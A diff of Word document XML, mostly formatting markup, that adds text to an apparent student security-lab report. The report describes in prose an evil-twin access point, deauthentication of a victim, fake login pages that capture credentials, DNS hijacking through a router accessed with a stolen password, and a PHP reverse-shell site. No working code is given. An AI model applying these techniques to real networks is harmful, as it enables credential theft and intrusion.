+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="FFFFFFFF">
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1C4F465C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8B50EB78"/>
@@ -2690,8 +2937,105 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="22B1178F"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="82D25552"/>
+    <w:lvl w:ilvl="0" w:tplc="C60C3CD0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+        <w:color w:val="auto"/>
+        <w:sz w:val="32"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="0C090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0C09001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0C09000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="0C090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0C09001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0C09000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="0C090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0C09001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="2">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -3161,6 +3505,22 @@
       <w:contextualSpacing/>
     </w:pPr>
   </w:style>
+  <w:style w:type="table" w:styleId="TableGrid">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:uiPriority w:val="39"/>
+    <w:rsid w:val="00B269B1"/>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+    </w:tblPr>
+  </w:style>
 </w:styles>
 </file>
 

--- a/Project1/Project_report.docx
+++ b/Project1/Project_report.docx
@@ -323,6 +323,24 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="40"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Summary</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:autoSpaceDE w:val="0"/>
         <w:autoSpaceDN w:val="0"/>
         <w:adjustRightInd w:val="0"/>
@@ -335,7 +353,13 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:b/>
@@ -343,8 +367,67 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
         <w:t>Task 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In this task , firstly ,we install the kali linux system in the raspberry </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">i, after that we </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>turn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on the raspberry pi and open the terminal typing `ifconfig` command it shows there is no connection with internet in wlan1 which means no ipv4 address been allocated to this machine we are using, and then we initialize the connection to the WIFI , we input the command again, it show the allocated ipv4 address in wlan1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -356,55 +439,10 @@
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
+          <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">In this task , firstly ,we install the kali linux system in the raspberry </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>P</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">i, after that we </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>turn</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> on the raspberry pi and open the terminal typing `ifconfig` command it shows there is no connection with internet in wlan1 which means no ipv4 address been allocated to this machine we are using, and then we initialize the connection to the WIFI , we input the command again, it show the allocated ipv4 address in wlan1</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -414,11 +452,81 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:color w:val="000000"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Task2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">In task 2, in the beginning, we create the fake AP which the name is same as the victim connected to, after that, we force </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the target to disconnect from </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">the original AP and connect to our fake AP, this is because the SSID of the original AP is same as the fake one, when the victim machine find </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">out </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>it can not connect the</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> real AP,  it will try to connect the fake one which because the SSID is same as the real one.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -434,7 +542,13 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:b/>
@@ -442,7 +556,83 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Task2</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Task3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>task</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2 , the victim have alreadly connect to the fake AP, in this situation, as long as victim machine try to browsing the web, the fake login webpage will show in front of the victim and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>mis</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>guide them to enter the username and password, this confidential information will capture in the backend of the raspberry Pi</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -453,65 +643,12 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
+          <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">In task 2, in the beginning, we create the fake AP which the name is same as the victim connected to, after that, we force </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">the target to disconnect from </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">the original AP and connect to our fake AP, this is because the SSID of the original AP is same as the fake one, when the victim machine find </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">out </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>it can not connect the</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> real AP,  it will try to connect the fake one which because the SSID is same as the real one.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -527,6 +664,165 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>ask 4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>or task 4_1, firstly the fake AP process is killed and deauthentication attack makes the victim device reconnect to the original AP immediately. Then, as the AP password has been stolen, we break into the router management interface and change the DNS settings, redirecting all DNS queries to the raspberry Pi. After that, the “dnsmasq” tool is in use to start a DNS server, with fake login page deployed on apache of kali linux, which poisoned a login website we choose. Finally, when user</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> visit the certain website, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>they</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> actually visit the fake site, as the backend started, the credentials are recorded</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> once they input.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:hint="eastAsia"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>F</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>or task 4_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>we create a vulnerable site which contains high-risky function in PHP that allows remote shell execution (reverse shell). Then kali performs as an attacker visiting the vulnerable site and type commands in shell then submit, which complete the tasks of file creating and deleting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Default"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -536,13 +832,33 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:b/>
           <w:color w:val="000000"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:b/>
@@ -550,8 +866,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Task3</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -561,74 +876,12 @@
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
